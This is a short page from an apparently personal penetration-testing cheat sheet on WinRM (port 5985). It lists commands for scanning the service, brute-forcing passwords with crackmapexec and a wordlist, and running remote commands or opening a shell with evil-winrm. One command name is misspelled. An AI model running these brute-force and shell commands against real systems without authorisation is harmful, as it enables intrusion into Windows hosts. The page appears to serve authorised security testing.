WinRM-5985

scan

nmap -sV -sC -Pn -p 5985 $IP -oN recon/winrm

brute force

# crackmapexec
crackpmapexec winrm $IP -u $username -p /path/to/wordlists

Execute commands

# crackmapexec
crackmapexec winrm $IP -u $username -p $password -x "whoami"
# evil-winrm (get a shell session)
evil-winrm -u $username -p $password -i $IP

PreviousRDP-3389 NextWeb Cheat Sheet

Last updated 1 year ago